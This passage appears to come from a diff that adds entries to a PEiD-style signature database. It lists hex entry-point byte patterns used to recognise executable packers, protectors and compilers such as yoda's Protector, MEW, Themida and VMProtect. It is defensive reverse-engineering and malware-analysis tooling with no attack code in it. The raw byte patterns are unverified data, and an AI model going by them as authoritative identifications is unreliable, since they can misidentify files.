71 07 ?? ?? 40 8B DB 7A 11 EB 08 ?? EB F7 EB C3 ?? 7A E9 70 DA 7B D1 71 F3 ?? 7B F3 71 D6 ?? 9D 61 83 ED 06 33 FF 47 60 33 C9 75 02 EB 15 ?? 33 C9 75 18 7A 0C 70 0E EB 0D ?? 72 0E 79 F1 ?? ?? ?? 79 09 74 F0 EB 87 ?? 7A F0 ?? ?? 61 8B 9C BD B8 43
+ep_only = true
+
+[Microsoft (R) Incremental Linker Version 5.12.8078 (MASM/TASM)]
+signature= 6A 00 68 00 30 40 00 68 1E 30 40 00 6A 00 E8 0D 00 00 00 6A 00 E8 00 00 00 00 FF 25 00 20 40 00 FF 25 08 20 40
+ep_only = true
+
+[MinGW]
+signature = 55 89 E5 83 EC 08 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? FF FF
+ep_only = true
+
+[EXE Shield v0.x -> Smoke]
+signature= E8 04 00 00 00 83 60 EB 0C 5D EB 05 45 55 EB 04 B8 EB F9 00 C3 E8 00 00 00 00 5D 81 ED BC 1A 40 00 EB 01 00 8D B5 46 1B 40 00 BA B3 0A 00 00 EB 01 00 8D 8D F9 25 40 00 8B 09 E8 14 00 00 00 83 EB 01 00 8B FE E8 00 00 00 00 58 83 C0 07 50 C3 00 EB 04 58 40 50 C3 8A 06 46 EB 01 00 D0 C8 E8 14 00 00 00 83 EB 01 00 2A C2 E8 00 00 00 00 5B 83 C3 07 53 C3 00 EB 04 5B 43 53 C3 EB 01 00 32 C2 E8 0B 00 00 00 00 32 C1 EB 01 00 C0 C0 02 EB 09 2A C2 5B EB 01 00 43 53 C3 88 07 EB 01 00 47 4A 75 B4 90
+ep_only = true
+
+[Thinstall v2.460 -> Jitit]
+signature= 55 8B EC 51 53 56 57 6A 00 6A 00 FF 15 F4 18 40 00 50 E8 87 FC FF FF 59 59 A1 94 1A 40 00 8B 40 10 03 05 90 1A 40 00 89 45 FC 8B 45 FC FF E0 5F 5E 5B C9 C3 00 00 00 76 0C 00 00 D4 0C 00 00 1E
+ep_only = true
+
+[yoda's Protector v1.01 -> Ashkbiz Danehkar]
+signature= 55 8B EC 53 56 57 E8 03 00 00 00 EB 01
+ep_only = true
+
+[yoda's Protector v1.0b -> Ashkbiz Danehkar]
+signature= 55 8B EC 53 56 57 60 E8 00 00 00 00 5D 81 ED 4C 32 40 00 E8 03 00 00 00 EB 01
+ep_only = true
+
+[yoda's Protector 1.02 -> Ashkibiz Danehlar]
+signature = E8 03 00 00 00 EB 01 ?? BB 55 00 00 00 E8 03 00 00 00 EB 01 ?? E8 8F 00 00 00 E8 03 00 00 00 EB 01 ?? E8 82 00 00 00 E8 03 00 00 00 EB 01 ?? E8 B8 00 00 00 E8 03 00 00 00 EB 01 ?? E8 AB 00 00 00 E8 03 00 00 00 EB 01 ?? 83 FB 55 E8 03 00 00 00 EB 01 ?? 75 2E E8 03 00 00 00 EB 01 ?? C3 60 E8 00 00 00 00 5D 81 ED 23 3F 42 00 8B D5 81 C2 72 3F 42 00 52 E8 01 00 00 00 C3 C3 E8 03 00 00 00 EB 01 ?? E8 0E 00 00 00 E8 D1 FF FF FF C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 CC C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 4B CC C3 E8 03 00 00 00 EB 01 ?? 33 DB B9 3A 66 42 00 81 E9 1D 40 42 00 8B D5 81 C2 1D 40 42 00 8D 3A 8B F7 33 C0 E8 03 00 00 00 EB 01 ?? E8 17 00 00 00 90 90 90 E9 C3 1F 00 00 33 C0 64 FF 30 64 89 20 43 CC C3 90 EB 01 ?? AC
+ep_only = True
+
+[yoda's Protector v1.02b-> Ashkbiz Danehkar]
+signature= E8 03 00 00 00 EB 01
+ep_only = true
+
+[yoda's Protector 1.03.1 -> Ashkibiz Danehlar]
+signature = E8 03 00 00 00 EB 01 ?? BB 55 00 00 00 E8 03 00 00 00 EB 01 ?? E8 8F 00 00 00 E8 03 00 00 00 EB 01 ?? E8 82 00 00 00 E8 03 00 00 00 EB 01 ?? E8 B8 00 00 00 E8 03 00 00 00 EB 01 ?? E8 AB 00 00 00 E8 03 00 00 00 EB 01 ?? 83 FB 55 E8 03 00 00 00 EB 01 ?? 75 2E E8 03 00 00 00 EB 01 ?? C3 60 E8 00 00 00 00 5D 81 ED 74 72 42 00 8B D5 81 C2 C3 72 42 00 52 E8 01 00 00 00 C3 C3 E8 03 00 00 00 EB 01 ?? E8 0E 00 00 00 E8 D1 FF FF FF C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 CC C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 4B CC C3 E8 03 00 00 00 EB 01 ?? 33 DB B9 3F A9 42 00 81 E9 6E 73 42 00 8B D5 81 C2 6E 73 42 00 8D 3A 8B F7 33 C0 E8 03 00 00 00 EB 01 ?? E8 17 00 00 00 90 90 90 E9 98 2E 00 00 33 C0 64 FF 30 64 89 20 43 CC C3 90 EB 01 ?? AC
+ep_only = True
+
+[yoda's cryptor 1.3 -> Ashkbiz Danehkar]
+signature= 55 8B EC 53 56 57 60 E8 00 00 00 00 5D 81 ED 6C 28 40 00 B9 5D 34 40 00 81 E9 C6 28 40 00 8B D5 81 C2 C6 28 40 00 8D 3A 8B F7 33 C0 EB 04 90 EB 01 C2 AC
+ep_only = true
+
+[ExeStealth -> WebToolMaster]
+signature= EB 58 53 68 61 72 65 77 61 72 65 2D 56 65 72 73 69 6F 6E 20 45 78 65 53 74 65 61 6C 74 68 2C 20 63 6F 6E 74 61 63 74 20 73 75 70 70 6F 72 74 40 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F
+ep_only = true
+
+[ARM Protector v0.2-> SMoKE]
+signature= E8 04 00 00 00 83 60 EB 0C 5D EB 05 45 55 EB 04 B8 EB F9 00 C3 E8 00 00 00 00 5D EB 01 00 81 ED 09 20 40 00 EB 02 83 09 8D B5 9A 20 40 00 EB 02 83 09 BA 0B 12 00 00 EB 01 00 8D 8D A5 32 40 00
+ep_only = true
+
+[MEW 10 packer v1.0 -> Northfox]
+signature= 33 C0 E9 ?? ?0
+ep_only = true
+
+[MEW 11 SE v1.0 -> Northfox]
+signature= E9 ?? ?? ?? ?? 00 00 00 02 00 00 00 0C ?0
+ep_only = true
+
+[MEW 11 SE v1.1 -> Northfox]
+signature= E9 ?? ?? ?? ?? 0C ?? ?? ?? 00 00 00 00 00 00 00 00
+ep_only = true
+
+[LamCrypt v1.0 -> LaZaRuS]
+signature= 60 66 9C BB 00 ?? ?? 00 80 B3 00 10 40 00 90 4B 83 FB FF 75 F3 66 9D 61 B8
+ep_only = true
+
+[ACProtect 1.09g -> Risco software Inc.]
+signature = 60 F9 50 E8 01 00 00 00 7C 58 58 49 50 E8 01 00 00 00 7E 58 58 79 04 66 B9 B8 72 E8 01 00 00 00 7A 83 C4 04 85 C8 EB 01 EB C1 F8 BE 72 03 73 01 74 0F 81 01 00 00 00 F9 EB 01 75 F9 E8 01 00 00
+ep_only = true
+
+[UPXcrypter -> archphase/NWC]
+signature = BF ?? ?? ?? 00 81 FF ?? ?? ?? 00 74 10 81 2F ?? 00 00 00 83 C7 04 BB 05 ?? ?? 00 FF E3 BE ?? ?? ?? 00 FF E6 00 00 00 00
+ep_only = true
+
+[ACProtect v1.90g -> Risco software Inc.]
+signature = 60 0F 87 02 00 00 00 1B F8 E8 01 00 00 00 73 83 04 24 06 C3
+ep_only = true
+
+[MEW 5 1.0 -> Northfox]
+signature = BE 5B 00 40 00 AD 91 AD 93 53 AD 96 56 5F AC C0 C0
+ep_only = true
+
+[ROD High TECH -> Ayman]
+signature = 60 8B 15 1D 13 40 00 F7 E0 8D 82 83 19 00 00 E8 58 0C 00 00
+ep_only = true
+
+[Alex Protector v1.0 -> Alex]
+signature = 60 E8 00 00 00 00 5D 81 ED 06 10 40 00 E8 24 00 00 00 EB 01 E9 8B
+ep_only = true
+
+[Unknown Packer -> Northfox]
+signature = 54 59 68 61 7A 79
+ep_only = true
+
+[hying's PE-Armor -> hying[CCG]]
+signature = E8 AA 00 00 00 2D ?? ?? ?? 00 00 00 00 00 00 00 00 3D
+ep_only= true
+
+[PE-Armor 0.46 -> China Cracking Group]
+signature = E8 AA 00 00 00 2D ?? ?? 00 00 00 00 00 00 00 00 00 3D ?? ?? 00 2D ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B ?? ?? 00 5C ?? ?? 00 6F ?? ?? 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 A2 01 00 00 ?? ?? 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 00 00 00 ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 00 00 00 00 00 00 00 00 5D 81 ED 05 00 00 00 8D 75 3D 56 FF 55 31 8D B5 86 00 00 00 56 50 FF 55 2D 89 85 93 00 00 00 6A 04 68 00 10 00 00 FF B5 82 00 00 00 6A 00 FF 95 93 00 00 00 50 8B 9D 7E 00 00 00 03 DD 50 53 E8 04 00 00 00 5A 55 FF E2 60 8B 74 24 24 8B 7C 24 28 FC
+ep_only = True
+
+[Microsoft Visual C++ v7.0]
+signature = 6A 0C 68 88 BF 01 10 E8 B8 1C 00 00 33 C0 40 89 45 E4 8B 75 0C 33 FF 3B F7 75 0C 39 3D 6C 1E 12 10 0F 84 B3 00 00 00 89 7D FC 3B F0 74 05 83 FE 02 75 31 A1 98 36 12 10 3B C7 74 0C FF 75 10 56
+ep_only = true
+
+[North Star PE Shrinker 1.3 -> Liuxingping]
+signature = 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5
+ep_only = true
+
+[WebCops [EXE] -> LINK Data Security]
+signature = EB 03 05 EB 02 EB FC 55 EB 03 EB 04 05 EB FB EB 53 E8 04 00 00 00 72
+ep_only = true
+
+[WebCops [DLL] -> LINK Data Security]
+signature = A8 BE 58 DC D6 CC C4 63 4A 0F E0 02 BB CE F3 5C 50 23 FB 62 E7 3D 2B
+ep_only = true
+
+[REALbasic]
+signature = 55 89 E5 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 50 ?? ?? ?? ?? ?? 00
+ep_only = true
+
+[PowerBASIC/CC 3.0x]
+signature = 55 8B EC 53 56 57 BB 00 ?? ?? 00 66 2E F7 05 ?? ?? ?? 00 04 00 0F 85
+ep_only = true
+
+[PowerBASIC/Win 7.0x]
+signature = 55 8B EC 53 56 57 BB 00 ?? 40 00 66 2E F7 05 ?? ?? 40 00 04 00 0F 85 DB 00 00 00
+ep_only = true
+
+[PE Ninja v1.0 -> +DzA kRAker TNT]
+signature = BE 5B 2A 40 00 BF 35 12 00 00 E8 40 12 00 00 3D 22 83 A3 C6 0F 85 67 0F 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
+ep_only = true
+
+
+[EXE Shield v0.1b - v0.3b, v0.3 -> SMoKE]
+signature = E8 04 00 00 00 83 60 EB 0C 5D EB 05
+ep_only = true
+
+[Themida -> Oreans Technologies 2004]
+signature = B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8
+ep_only = true
+
+[Packanoid -> Arkanoid]
+signature = BF 00 10 40 00 BE ?? ?? ?? 00 E8 9D 00 00 00 B8
+ep_only = true
+
+[Packanoid 1.0 -> ackanoid]
+signature = BF 00 ?? 40 00 BE ?? ?? ?? 00 E8 9D 00 00 00 B8 ?? ?? ?? 00 8B 30 8B 78 04 BB ?? ?? ?? 00 8B 43 04 91 E3 1F 51 FF D6 56 96 8B 13 8B 02 91 E3 0D 52 51 56 FF D7 5A 89 02 83 C2 04 EB EE 83 C3 08 5E EB DB B9 ?? ?? 00 00 BE 00 ?? ?? 00 EB 01 00 BF ?? ?? ?? 00 EB 21 00 ?? ?? 00 00 ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 00 C0 00 F3 A4 E9 ?? ?? ?? 00 00 ?? ?? 00 00 ?? ?? 00 ?? ?? ?? 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 00 C0 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 FC B2 80 31 DB A4 B3 02 E8 6D 00 00 00 73 F6 31 C9 E8 64 00 00 00 73 1C 31 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 10 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 29 D9 75 10 E8 42 00 00 00 EB 28 AC D1 E8 74 4D 11 C9 EB 1C 91 48 C1 E0 08 AC E8 2C
+ep_only = True
+
+[Alloy 4.x -> PGWare LLC]
+signature = 9C 60 E8 02 00 00 00 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 07 30 40 00 87 DD 6A 04 68 00 10 00 00 68 00 02 00 00 6A 00 FF 95 A8 33 40 00 0B C0 0F 84 F6 01 00 00 89 85 2E 33 40 00 83 BD E8 32 40 00 01 74 0D 83 BD E4 32 40 00 01 74 2A 8B F8 EB 3E 68 D8 01 00 00 50 FF 95 CC 33 40 00 50 8D 85 28 33 40 00 50 FF B5 2E 33 40 00 FF 95 D0 33 40 00 58 83 C0 05 EB 0C 68 D8 01 00 00 50 FF 95 C0 33 40 00 8B BD 2E 33 40 00 03 F8 C6 07 5C 47 8D B5 00 33 40 00 AC 0A C0 74 03 AA EB F8 83 BD DC 32 40 00 01 74 7A 6A 00 68 80 00 00 00 6A 03 6A 00 6A 00 68 00 00 00 80 FF B5 2E 33 40 00 FF 95 B4 33 40 00 83 F8 FF 74 57 89 85 32 33 40 00 8D 85 56 33 40 00 8D 9D 5E 33 40 00 8D 8D 66 33 40 00 51 53 50 FF B5 32 33 40 00 FF 95 C4 33 40 00 FF B5 32 33 40 00 FF 95 B8 33 40 00 8B 85
+ep_only = True
+
+[SoftDefender 1.x -> Randy Li]
+signature = 74 07 75 05 19 32 67 E8 E8 74 1F 75 1D E8 68 39 44 CD 00 59 9C 50 74 0A 75 08 E8 59 C2 04 00 55 8B EC E8 F4 FF FF FF 56 57 53 78 0F 79 0D E8 34 99 47 49 34 33 EF 31 34 52 47 23 68 A2 AF 47 01 59 E8 01 00 00 00 FF 58 05 E6 01 00 00 03 C8 74 BD 75 BB E8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = True
+
+[SDProtector 1.x -> Randy Li]
+signature = 55 8B EC 6A FF 68 1D 32 13 05 68 88 88 88 08 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 58 64 A3 00 00 00 00 58 58 58 58 8B E8 E8 3B 00 00 00 E8 01 00 00 00 FF 58 05 53 00 00 00 51 8B 4C 24 10 89 81 B8 00 00 00 B8 55 01 00 00 89 41 20 33 C0 89 41 04 89 41 08 89 41 0C 89 41 10 59 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 33 C0 64 FF 30 64 89 20 9C 80 4C 24 01 01 9D 90 90 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 64 8F 00 58 74 07 75 05 19 32 67 E8 E8 74 27 75 25 EB 00 EB FC 68 39 44 CD 00 59 9C 50 74 0F 75 0D E8 59 C2 04 00 55 8B EC E9 FA FF FF 0E E8 EF FF FF FF 56 57 53 78 03 79 01 E8 68 A2 AF 47 01 59 E8 01 00 00 00 FF 58 05 7B 03 00 00 03 C8 74 C4 75 C2 E8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = True
+
+[ExeJoiner 1.0 -> Yoda f2f]
+signature = 68 00 10 40 00 68 04 01 00 00 E8 39 03 00 00 05 00 10 40 00 C6 00 5C 68 04 01 00 00 68 04 11 40 00 6A 00 E8 1A 03 00 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 01 68 00 00 00 80 68 04 11 40 00 E8 EC 02 00 00 83 F8 FF 0F 84 83 02 00 00 A3 08 12 40 00 6A 00 50 E8 E2 02 00 00 83 F8 FF 0F 84 6D 02 00 00 A3 0C 12 40 00 8B D8 83 EB 04 6A 00 6A 00 53 FF 35 08 12 40 00 E8 E3 02 00 00 6A 00 68 3C 12 40 00 6A 04 68 1E 12 40 00 FF 35 08 12 40 00 E8 C4 02 00 00 83 EB 04 6A 00 6A 00 53 FF 35 08 12 40 00 E8 B7 02 00 00 6A 00 68 3C 12 40 00 6A 04 68 1A 12 40 00 FF 35 08 12 40 00 E8 98 02 00 00 83 EB 04 6A 00 6A 00 53 FF 35 08 12 40 00 E8 8B 02 00 00 6A 00 68 3C 12 40 00 6A 04 68 34 12 40 00 FF 35 08 12 40 00 E8 6C 02 00 00 83 EB 04 6A 00 6A 00 53 FF 35 08 12 40 00 E8 5F 02 00 00
+ep_only = True
+
+[EmbedPE 1.13 -> cyclotron]
+signature = 83 EC 50 60 68 5D B9 52 5A E8 2F 99 00 00 DC 99 F3 57 05 68 B8 5E 2D C6 DA FD 48 63 05 3C 71 B8 5E 97 7C 36 7E 32 7C 08 4F 06 51 64 10 A3 F1 4E CF 25 CB 80 D2 99 54 46 ED E1 D3 46 86 2D 10 68 93 83 5C 46 4D 43 9B 8C D6 7C BB 99 69 97 71 2A 2F A3 38 6B 33 A3 F5 0B 85 97 7C BA 1D 96 DD 07 F8 FD D2 3A 98 83 CC 46 99 9D DF 6F 89 92 54 46 9F 94 43 CC 41 43 9B 8C 61 B9 D8 6F 96 3B D1 07 32 24 DD 07 05 8E CB 6F A1 07 5C 62 20 E0 DB BA 9D 83 54 46 E6 83 51 7A 2B 94 54 64 8A 83 05 68 D7 5E 2D C6 B7 57 00 B3 E8 3C 71 B8 3C 97 7C 36 19 32 7C 08 2A 06 51 64 73 A3 F1 4E 92 25 CB 80 8D 99 54 46 B0 E1 D3 46 A5 2D 10 68 B6 83 91 46 F2 DF 64 FD D1 BC CA AA 70 E2 AB 39 AE 3B 5A 6F 9B 15 BD 25 98 25 30 4C AD 7D 55 07 A8 A3 AC 0A C1 BD 54 72 BC 83 54 82 A3 97 B1 1A B3 83 54 46 83
+ep_only = True
+
+[Dual's eXe 1.0]
+signature = 55 8B EC 81 EC 00 05 00 00 E8 00 00 00 00 5D 81 ED 0E 00 00 00 8D 85 08 03 00 00 89 28 33 FF 8D 85 7D 02 00 00 8D 8D 08 03 00 00 2B C8 8B 9D 58 03 00 00 E8 1C 02 00 00 8D 9D 61 02 00 00 8D B5 7C 02 00 00 46 80 3E 00 74 24 56 FF 95 0A 04 00 00 46 80 3E 00 75 FA 46 80 3E 00 74 E7 50 56 50 FF 95 0E 04 00 00 89 03 58 83 C3 04 EB E3 8D 85 24 03 00 00 50 68 1F 00 02 00 6A 00 8D 85 48 03 00 00 50 68 01 00 00 80 FF 95 69 02 00 00 83 BD 24 03 00 00 00 0F 84 8B 00 00 00 C7 85 28 03 00 00 04 00 00 00 8D 85 28 03 00 00 50 8D 85 20 03 00 00 50 8D 85 6C 03 00 00 50 6A 00 8D 85 62 03 00 00 50 FF B5 24 03 00 00 FF 95 71 02 00 00 83 BD 20 03 00 00 01 7E 02 EB 20 6A 40 8D 85 73 03 00 00 50 8D 85 82 03 00 00 50 6A 00 FF 95 61 02 00 00 6A 00 FF 95 65 02 00 00 FF 8D 20 03 00 00 FF
+ep_only = True
+
+[Crunch v5 -> Bit-Arts]
+signature = EB 15 03 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 68 00 00 00 00 55 E8 00 00 00 00 5D 81 ED 1D 00 00 00 8B C5 55 60 9C 2B 85 FC 07 00 00 89 85 E8 07 00 00 FF 74 24 2C E8 20 02 00 00 0F 82 94 06 00 00 E8 F3 04 00 00 49 0F 88 88 06 00 00 8B B5 E8 07 00 00 8B 56 3C 8D 8C 32 C8 00 00 00 83 39 00 74 50 8B D9 53 68 BB D4 C3 79 33 C0 50 E8 0E 04 00 00 50 8D 95 EC 07 00 00 52 6A 04 68 00 10 00 00 FF B5 E8 07 00 00 FF D0 58 5B C7 03 00 00 00 00 C7 43 04 00 00 00 00 8D 95 F0 07 00 00 52 FF B5 EC 07 00 00 68 00 10 00 00 FF B5 E8 07 00 00 FF D0 68 6C D9 B2 96 33 C0 50 E8 C1 03 00 00 89 85 ?? 46 00 00 68 EC 49 7B 79 33 C0 50 E8 AE 03 00 00 89 85 ?? 46 00 00 E8 04 06 00 00 E9 F3 05 00 00 51 52 53 33 C9 49 8B D1 33 C0 33 DB AC 32 C1 8A CD 8A EA 8A D6 B6 08 66 D1 EB 66 D1
+ep_only = True
+
+[Goat's PE Mutilator 1.6]
+signature = E8 EA 0B 00 00 ?? ?? ?? 8B 1C 79 F6 63 D8 8D 22 B0 BF F6 49 08 C3 02 BD 3B 6C 29 46 13 28 5D 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0F 53 0F DE 0F 55 0F 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = True
+
+[Vcasm-Protector 1.0]
+signature = 55 8B EC 6A FF 68 ?? ?? ?? 00 68 ?? ?? ?? 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 C3 FF 35 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 C3 FF 35 E8 07 00 00 00 C7 83 83 C0 13 EB 0B 58 EB 02 CD 20 83 C0 02 EB 01 E9 50 C3 E8 B9 04 00 00 00 E8 1F 00 00 00 EB FA E8 16 00 00 00 E9 EB F8 00 00 58 EB 09 0F 25 E8 F2 FF FF FF 0F B9 49 75 F1 EB 05 EB F9 EB F0 D6 EB 01 0F 31 F0 EB 0C 33 C8 EB 03 EB 09 0F 59 74 05 75 F8 51 EB F1 E8 16 00 00 00 8B 5C 24 0C 8B A3 C4 00 00 00 64 8F 05 00 00 00 00 83 C4 04 EB 14 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C9 99 F7 F1 E9 E8 05 00 00 00 0F 01 EB 05 E8 EB FB 00 00 83 C4 04 B9 04 00 00 00 E8 1F 00 00 00 EB FA E8 16 00 00 00 E9 EB F8 00 00 58 EB 09 0F 25 E8 F2 FF FF FF 0F B9
+ep_only = True
+
+[ExeShield 3.6 -> www.exeshield.com]
+signature = B8 ?? ?? ?? 00 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 6F 6D 70 61 63 74 32 00 CE 1E 42 AF F8 D6 CC E9 FB C8 4F 1B 22 7C B4 C8 0D BD 71 A9 C8 1F 5F B1 29 8F 11 73 8F 00 D1 88 87 A9 3F 4D 00 6C 3C BF C0 80 F7 AD 35 23 EB 84 82 6F 8C B9 0A FC EC E4 82 97 AE 0F 18 D2 47 1B 65 EA 46 A5 FD 3E 9D 75 2A 62 80 60 F9 B0 0D E1 AC 12 0E 9D 24 D5 43 CE 9A D6 18 BF 22 DA 1F 72 76 B0 98 5B C2 64 BC AE D8
+ep_only = True
+
+[PocketPC SHA]
+signature = 86 2F 96 2F A6 2F B6 2F 22 4F 43 68 53 6B 63 6A 73 69 F0 7F 0B D0 0B 40 09 00 09 D0 B3 65 A3 66 93 67 0B 40 83 64 03 64 04 D0 0B 40 09 00 10 7F 26 4F F6 6B F6 6A F6 69 0B 00 F6 68 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 22 4F F0 7F 0A D0 06 D4 06 D5 0B 40 09 00 08 D0 05 D4 06 D5 0B 40 09 00 10 7F 26 4F 0B 00 09 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 7F ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? 00
+ep_only = True
+
+[PocketPC MIB]
+signature = E8 FF BD 27 14 00 BF AF 18 00 A4 AF 1C 00 A5 AF 20 00 A6 AF 24 00 A7 AF ?? ?? ?? 0C 00 00 00 00 18 00 A4 8F 1C 00 A5 8F 20 00 A6 8F ?? ?? ?? 0C 24 00 A7 8F ?? ?? ?? 0C 25 20 40 00 14 00 BF 8F 08 00 E0 03 18 00 BD 27 ?? FF BD 27 18 00 ?? AF ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? 00 01 3C ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? 8C ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? 00
+ep_only = True
+
+[PocketPC ARM]
+signature = F0 40 2D E9 00 40 A0 E1 01 50 A0 E1 02 60 A0 E1 03 70 A0 E1 ?? 00 00 EB 07 30 A0 E1 06 20 A0 E1 05 10 A0 E1 04 00 A0 E1 ?? ?? ?? EB F0 40 BD E8 ?? 00 00 EA ?? 40 2D E9 ?? ?? 9F E5 ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? 9F E5 00 ?? ?? ?? ?? 00
+ep_only = True
+
+[Hide PE 1.01 -> BGCorp]
+signature = ?? BA ?? ?? ?? 00 B8 ?? ?? ?? ?? 89 02 83 C2 04 B8 ?? ?? ?? ?? 89 02 83 C2 04 B8 ?? ?? ?? ?? 89 02 83 C2 F8 FF E2 0D 0A 2D 3D 5B 20 48 69 64 65 50 45 20 62 79 20 42 47 43 6F 72 70 20 5D 3D 2D
+ep_only = True
+
+[VMProtect 0.7x - 0.8 -> PolyTech]
+signature = 5B 20 56 4D 50 72 6F 74 65 63 74 20 76 20 30 2E 38 20 28 43 29 20 50 6F 6C 79 54 65 63 68 20 5D
+ep_only = False
+
+[PE Crypt 1.5 -> BitShape Software]
+signature = 60 E8 00 00 00 00 5D 81 ED 55 20 40 00 B9 7B 09 00 00 8D BD 9D 20 40 00 8B F7 AC ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? AA E2 CC
+ep_only = True
+
+[LameCrypt -> LaZaRus]
+signature = 60 66 9C BB 00 ?? ?? 00 80 B3 00 10 40 00 90 4B 83 FB FF 75 F3 66 9D 61 B8 ?? ?? 40 00 FF E0
+ep_only = True
+
+[PeX 0.99 -> bart^CrackPl]
